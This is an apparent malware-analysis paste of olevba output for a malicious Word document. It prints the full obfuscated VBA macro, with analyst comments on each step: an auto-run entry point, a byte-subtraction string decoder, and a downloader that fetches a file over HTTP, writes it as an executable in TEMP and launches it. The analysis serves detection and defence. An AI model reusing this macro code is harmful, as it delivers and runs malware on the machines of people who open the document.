dynamoo

Malicious Word macro

Apr 2nd, 2015
  1. olevba 0.25 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MAS--B- 07623989.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: 07623989.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: 07623989.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. Sub autoopen() ' AutoOpen entry point: Word runs this as soon as the document is opened (the AutoExec row in the ANALYSIS table below is this Sub)
  16. S6Wrk7025w4 ' bare procedure call; S6Wrk7025w4 is not defined in any of the four modules olevba printed here -- presumably it sits in a stream not shown, or the paste is incomplete; confirm against the full VBA project before assuming the chain is autoopen -> LZHGWIJZGNT
  17. End Sub
  18. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  19. ANALYSIS:
  20. +----------+----------+---------------------------------------+
  21. | Type     | Keyword  | Description                           |
  22. +----------+----------+---------------------------------------+
  23. | AutoExec | AutoOpen | Runs when the Word document is opened |
  24. +----------+----------+---------------------------------------+
  25. -------------------------------------------------------------------------------
  26. VBA MACRO dfsdfsdf.bas
  27. in file: 07623989.doc - OLE stream: u'Macros/VBA/dfsdfsdf'
  28. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  29.  
  30. Sub LZHGWIJZGNT() ' Driver: decodes the two arguments at run time and hands them to MQtf7O (module sdfsdfggg). Every literal is recovered through h08Nt7g80a0OJNSxSH__54e (Module1), so nothing in this Sub is readable statically.
  31.      MQtf7O h08Nt7g80a0OJNSxSH__54e("Ò¿¾ÊŠ‚z ƒxŽ‡ƒ¡y{ƒšƒz‰²Í|Ѿƒ‰»´¹Ý»xÄÀº", "jKJZPSKi"), Environ(h08Nt7g80a0OJNSxSH__54e("¡¶¼§", "MqoWLfWN")) & h08Nt7g80a0OJNSxSH__54e("½Þ¸º»¬Î×Ѻ‚­ÀÍ", "akTTHHhq") ' arg 1 is the string MQtf7O passes to .Open as the request target; arg 2 is Environ(<decoded name>) & <decoded suffix>, the destination file path. Running the Module1 decoder over the pasted bytes (read as cp1252) gives TEMP for the Environ name and a "\<name>.exe" suffix, but the paste has dropped at least one byte, so verify with olevba --decode on the original sample.
  32. End Sub
  33. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  34. ANALYSIS:
  35. +------------+----------------+-----------------------------------------+
  36. | Type       | Keyword        | Description                             |
  37. +------------+----------------+-----------------------------------------+
  38. | Suspicious | Environ        | May read system environment variables   |
  39. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  40. |            |                | may be used to obfuscate strings        |
  41. |            |                | (option --decode to see all)            |
  42. +------------+----------------+-----------------------------------------+
  43. -------------------------------------------------------------------------------
  44. VBA MACRO sdfsdfggg.bas
  45. in file: 07623989.doc - OLE stream: u'Macros/VBA/sdfsdfggg'
  46. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  47. Function MQtf7O(ByVal ãÏÐÃìðâûàï As String, ByVal øÐÃèâûàûâàï As String) As Boolean ' Download-and-run helper. Param 1: request target handed to .Open; param 2: path the response body is written to. Declared As Boolean but no value is ever assigned, so it always returns False; the only caller (LZHGWIJZGNT) discards the result.
  48.      Dim øÏíãìûâãàÀ As Object, äØÙÐãîøâûàà As Long, ùÈÎÐâûàààà As Long, ðãÏÈÃÈÐâààà() As Byte ' øÏíãìûâãàÀ: COM request object; äØÙÐãîøâûàà: declared, never used; ùÈÎÐâûàààà: VBA file number; ðãÏÈÃÈÐâààà: downloaded bytes
  49.  
  50.     Set øÏíãìûâãàÀ = CreateObject(h08Nt7g80a0OJNSxSH__54e("¦¨œž¼£€¹¢™ÄÅ¢", "YUDQpqRa")) ' ProgID is decoded at run time; the Module1 decoder applied to the pasted bytes yields MSXML2.XMLHTTP (one byte appears to be missing from the paste) -- confirm with olevba --decode
  51.     øÏíãìûâãàÀ.Open h08Nt7g80a0OJNSxSH__54e("´”½", "mOiNlEdE"), ãÏÐÃìðâûàï, False ' first literal decodes to GET; the False third argument presumably selects a synchronous request so responseBody is complete by line 54
  52.     øÏíãìûâãàÀ.Send h08Nt7g80a0OJNSxSH__54e("…", "PJbKhRbh") ' a one-character decoded literal is sent as the request body; no On Error handler anywhere in this function, so a failed request raises here and the macro stops
  53.  
  54.     ðãÏÈÃÈÐâààà = øÏíãìûâãàÀ.responseBody ' raw payload bytes, held in memory until written below
  55.  
  56.     ùÈÎÐâûàààà = FreeFile ' binary-mode write of the payload to param 2: Open / Put / Close. This is the on-disk artifact to hunt for (olevba flags Open, Put and Binary in the table below)
  57.     Open øÐÃèâûàûâàï For Binary As #ùÈÎÐâûàààà
  58.     Put #ùÈÎÐâûàààà, , ðãÏÈÃÈÐâààà
  59.     Close #ùÈÎÐâûàààà
  60.    
  61.     Dim îðÈÃãèðââà ' untyped (Variant) holder for the second COM object
  62. Set îðÈÃãèðââà = CreateObject(h08Nt7g80a0OJNSxSH__54e("·Ø¬ÂÏ“¯¼à³¿ÆÆâÍßµ", "dpGVcenL")) ' decoder on the pasted bytes yields Shell.Application; its .Open on the next line is what launches the written file
  63. îðÈÃãèðââà.Open Environ(h08Nt7g80a0OJNSxSH__54e("›¯¹£", "GjlSYrAo")) & h08Nt7g80a0OJNSxSH__54e("±‡†ƒ‰{‡†…ƒŠt²Í¶", "UQQPUFMT") ' NOTE(review): the path is rebuilt here from Environ(<decoded>) & <decoded suffix> instead of reusing param 2 -- the two are encoded independently, so they need not name the same file. The Environ name again decodes to TEMP; this suffix could not be cleanly recovered from the pasted bytes, so compare both paths with olevba --decode before relying on a single file name as an IOC.
  64.  
  65.      
  66.  
  67. End Function
  68. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  69. ANALYSIS:
  70. +------------+----------------+-----------------------------------------+
  71. | Type       | Keyword        | Description                             |
  72. +------------+----------------+-----------------------------------------+
  73. | Suspicious | CreateObject   | May create an OLE object                |
  74. | Suspicious | Open           | May open a file                         |
  75. | Suspicious | Environ        | May read system environment variables   |
  76. | Suspicious | Put            | May write to a file (if combined with   |
  77. |            |                | Open)                                   |
  78. | Suspicious | Binary         | May read or write a binary file (if     |
  79. |            |                | combined with Open)                     |
  80. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  81. |            |                | may be used to obfuscate strings        |
  82. |            |                | (option --decode to see all)            |
  83. +------------+----------------+-----------------------------------------+
  84. -------------------------------------------------------------------------------
  85. VBA MACRO Module1.bas
  86. in file: 07623989.doc - OLE stream: u'Macros/VBA/Module1'
  87. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  88.  
  89.  
  90. Public Function h08Nt7g80a0OJNSxSH__54e(ByVal lvFUAJ4O4Ww As String, ByVal HQ07 As String) ' String decoder used by every other module: subtracts the key bytes (HQ07) from the encoded bytes (lvFUAJ4O4Ww), cycling the key, and returns the plaintext. No return type declared, so the result is a Variant holding a String.
  91. Dim D1WW3_661OJL03d46MkaCZS() As Byte ' encoded text as an ANSI byte array; decoded in place
  92. Dim AF8S1() As Byte ' key as an ANSI byte array
  93. Dim iKuNclvIQNbaO15, jbUlyOYaUaoVg84 As Integer ' only jbUlyOYaUaoVg84 is Integer; VBA applies the As clause to the last name only, so iKuNclvIQNbaO15 is a Variant
  94. jbUlyOYaUaoVg84 = 3444 ' start of a 98-round loop whose running sum is never read afterwards: dead code, possibly padding or a small delay, with DoEvents yielding to the message pump each round
  95. For iKuNclvIQNbaO15 = 0 To 97
  96. jbUlyOYaUaoVg84 = jbUlyOYaUaoVg84 + iKuNclvIQNbaO15
  97. DoEvents
  98. Next iKuNclvIQNbaO15
  99.  
  100.  
  101. D1WW3_661OJL03d46MkaCZS = StrConv(lvFUAJ4O4Ww, vbFromUnicode) ' vbFromUnicode converts both strings to single-byte (ANSI) arrays, so the arithmetic below is on code-page bytes, not UTF-16 units
  102. AF8S1 = StrConv(HQ07, vbFromUnicode)
  103. For i = 0 To UBound(D1WW3_661OJL03d46MkaCZS) ' i is never declared (no Option Explicit visible) -- an implicit Variant
  104. If i <= UBound(AF8S1) Then
  105. D1WW3_661OJL03d46MkaCZS(i) = D1WW3_661OJL03d46MkaCZS(i) - AF8S1(i) ' Byte - Byte that goes negative raises an Overflow error in VBA, so every encoded byte must be >= its key byte; consistent with the high-range characters seen in the callers
  106. Else
  107. D1WW3_661OJL03d46MkaCZS(i) = D1WW3_661OJL03d46MkaCZS(i) - AF8S1(i Mod UBound(AF8S1)) ' wraps with i Mod UBound(AF8S1), i.e. modulo (key length - 1), so after the first pass the last key byte is never used; the encoder must share this off-by-one or nothing beyond the first pass would decode
  108. End If
  109. Next i
  110. h08Nt7g80a0OJNSxSH__54e = StrConv(D1WW3_661OJL03d46MkaCZS, vbUnicode) ' back to a VBA (UTF-16) string
  111. End Function
  112. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  113. ANALYSIS:
  114. No suspicious keyword or IOC found.